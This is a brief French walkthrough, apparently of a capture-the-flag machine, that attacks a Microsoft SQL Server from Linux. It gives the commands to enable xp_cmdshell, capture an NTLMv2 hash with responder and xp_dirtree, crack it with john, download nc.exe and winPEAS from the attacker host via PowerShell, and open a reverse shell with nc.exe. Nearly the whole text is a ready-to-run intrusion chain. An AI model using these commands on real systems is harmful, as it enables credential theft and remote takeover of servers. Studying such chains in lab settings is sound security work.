On peut se connecter via linux à un server mssql via l’utilitaire mssqlclient.py qui est inclus avec impacket
mssqlclient.py -windows-auth nomdelordi/reporting@10.9.0.60
enable_xp_cmdshell
Si nous n’avons pas la permission, nous pouvons utiliser l’outil responder pour obtenir le NTLMv2-SSP Hashh. L’outil s’exécute sur l’ordinateur de l’attaquant (10.9.0.60)
responder -I tun0
Et puis nous faisons une requête sur le shell SQL
xp_dirtree "\\10.9.0.60\whatever"
nous pouvons tenter de cracker le hash obtenu
john -w=/usr/share/wordlists/rockyou.txt SMB-NTLMv2-SSP0 10.10.10.10.txt
On se reconnecte avec le nom d’usager et le mot de passe trouvé
mssqlclient.py -windows-auth querier/mssql-svc@10.10.10.10
enable_xp_cmdshell
RECONFIGURE
xp_cmdshell "powershell.exe -command Invoke-WebRequest -Uri http://10.9.0.60:8000/nc.exe -OutFile C:\Users\mssql-svc\nc.exe "
xp_cmdshell "powershell.exe -command Invoke-WebRequest -Uri http://10.9.0.60:8000/winPEAS.exe -OutFile C:\Users\mssql-svc\winPEAS.exe "
xp_cmdshell "c:\users\mssql-svc\nc.exe -e cmd.exe 10.9.0.60 4444"